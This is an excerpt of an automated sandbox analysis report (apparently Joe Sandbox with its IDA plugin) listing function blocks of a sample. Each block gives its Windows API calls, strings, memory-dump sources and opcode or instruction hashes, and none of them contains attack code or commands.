                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                • Opcode ID: 9656e3fe88f932257bd369db6d5790c90a52273658fd66a1d217d9d1711a3950
                                                                                                                • Instruction ID: 3807d00ba1570cdd71bff750717542d98599d0eccbbe250d76652a9066cabadf
                                                                                                                • Opcode Fuzzy Hash: 9656e3fe88f932257bd369db6d5790c90a52273658fd66a1d217d9d1711a3950
                                                                                                                • Instruction Fuzzy Hash: D50192B1A41219AFCB18ABA4CC568FF736AAF46320F140A19BC26672E1EE31580CC650
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC
                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00658D6B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                • Opcode ID: c099a0eb553cffc6875514538ed6c723e4a0d874079a3395fd5e3fcaf2b8867d
                                                                                                                • Instruction ID: d99282239b7911ea26823d897ea6901fab92ac17f82239e7e23f69795ae39caa
                                                                                                                • Opcode Fuzzy Hash: c099a0eb553cffc6875514538ed6c723e4a0d874079a3395fd5e3fcaf2b8867d
                                                                                                                • Instruction Fuzzy Hash: 9801B1B1A81108AFCF18EBA0C952AFF73AA9F15341F100129B806772D1EE215E0C9665
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC
                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00658DEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                • Opcode ID: 20c908a4f0e53c60ebc2b62c56a7589063784c66917335a94e8c89c275d041a9
                                                                                                                • Instruction ID: e8e296cc7bf3f0a78cb9773d4ddfd272560e08ad390d4e2478ec042a1fe9ac15
                                                                                                                • Opcode Fuzzy Hash: 20c908a4f0e53c60ebc2b62c56a7589063784c66917335a94e8c89c275d041a9
                                                                                                                • Instruction Fuzzy Hash: CC01A7B1A81109BFDF15E7A4C942AFF77AA9F11301F100129BC06732D1DE255E0DD675
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0065C534
                                                                                                                  • Part of subcall function 0065C816: _memmove.LIBCMT ref: 0065C860
                                                                                                                  • Part of subcall function 0065C816: VariantInit.OLEAUT32(00000000), ref: 0065C882
                                                                                                                  • Part of subcall function 0065C816: VariantCopy.OLEAUT32(00000000,?), ref: 0065C88C
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0065C556
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                • String ID: d}k
                                                                                                                • API String ID: 2932060187-4033742213
                                                                                                                • Opcode ID: 1d27666c15c305edc18b46a659599f7c38e217c745f0a9f83b5fb3ced88b4249
                                                                                                                • Instruction ID: c39b85a369a8c0d6352fd2b9a1a4b3b64fecc4bc7a8206b5710d1eae5d56bfb7
                                                                                                                • Opcode Fuzzy Hash: 1d27666c15c305edc18b46a659599f7c38e217c745f0a9f83b5fb3ced88b4249
                                                                                                                • Instruction Fuzzy Hash: C81100B19007089FC710DF99D88489BFBF9FF08350B50862FE58AD7652E771AA48CB94
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp
                                                                                                                • String ID: #32770
                                                                                                                • API String ID: 2292705959-463685578
                                                                                                                • Opcode ID: da42ed1c346dc7ae83de519431693e2d9450e48fc94d956331338e94eff12b64
                                                                                                                • Instruction ID: c67d459f9cf00182eea162dd0392b1d29a2588b6223ea010d5a530f2a4c9d3af
                                                                                                                • Opcode Fuzzy Hash: da42ed1c346dc7ae83de519431693e2d9450e48fc94d956331338e94eff12b64
                                                                                                                • Instruction Fuzzy Hash: C0E092326002382AE7209B99AC49EA7F7ADEB95B60F11016AFD04D3151DA60AA558BE4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0063B314: _memset.LIBCMT ref: 0063B321
                                                                                                                  • Part of subcall function 00620940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0063B2F0,?,?,?,0060100A), ref: 00620945
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0060100A), ref: 0063B2F4
                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0060100A), ref: 0063B303
                                                                                                                Strings
                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0063B2FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                • API String ID: 3158253471-631824599
                                                                                                                • Opcode ID: 6ab7e537b5f0d8d5fb9c4a4365b9a658652877434418374b0cec90405a810db8
                                                                                                                • Instruction ID: 4c6a8c070d21baec4b87ef51ab6a255b336258739a45a255171bac72655a2f65
                                                                                                                • Opcode Fuzzy Hash: 6ab7e537b5f0d8d5fb9c4a4365b9a658652877434418374b0cec90405a810db8
                                                                                                                • Instruction Fuzzy Hash: 19E06DB02007218BE760AF68E8047427AE6BF00304F049A6CE456C7241EBB4E884CFA1
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00641775
                                                                                                                  • Part of subcall function 0067BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0064195E,?), ref: 0067BFFE
                                                                                                                  • Part of subcall function 0067BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0067C010
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0064196D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                • String ID: WIN_XPe
                                                                                                                • API String ID: 582185067-3257408948
                                                                                                                • Opcode ID: 67b555515f46e3d0d5c1f0c5e0eac0e8bd9e237e5637810280672434a3c7f51b
                                                                                                                • Instruction ID: f0d4d574f3970f134f996fc9c4ebf540bda15e8ae86ae0b91923ed2ab9021b4c
                                                                                                                • Opcode Fuzzy Hash: 67b555515f46e3d0d5c1f0c5e0eac0e8bd9e237e5637810280672434a3c7f51b
                                                                                                                • Instruction Fuzzy Hash: 2CF0ED70800109EFDB15EB91C988BECBBFAFB09301F641096F112A6190D7755F85DF64
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0068596E
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00685981
                                                                                                                  • Part of subcall function 00665244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006652BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 6086999325b0c40edba48f0d2b04ba06cde783409b19687ae6eb65241e563d5a
                                                                                                                • Instruction ID: 7864af3747cb635c45534e910745a5827c8b0a2cb51f30d313bbc4875622eb24
                                                                                                                • Opcode Fuzzy Hash: 6086999325b0c40edba48f0d2b04ba06cde783409b19687ae6eb65241e563d5a
                                                                                                                • Instruction Fuzzy Hash: 48D0C932384311BAE7A4BB709C1BFD66A1AAB10B50F011929B24AAB1D0D9E0A840C754
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006859AE
                                                                                                                • PostMessageW.USER32(00000000), ref: 006859B5
                                                                                                                  • Part of subcall function 00665244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006652BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 3ceaa337c37f91499766cd79c8ded6913ae9515e8abb1c9cb1b3339aa2a3af3f
                                                                                                                • Instruction ID: bf315cb1743de8480922273a6b4fed0d115842cc359c00f0e9a7e40874232d80
                                                                                                                • Opcode Fuzzy Hash: 3ceaa337c37f91499766cd79c8ded6913ae9515e8abb1c9cb1b3339aa2a3af3f
                                                                                                                • Instruction Fuzzy Hash: 64D0C9323803117AE7A4BB709C0BFD6661AAB14B50F011929B246AB1D0D9E0A840C758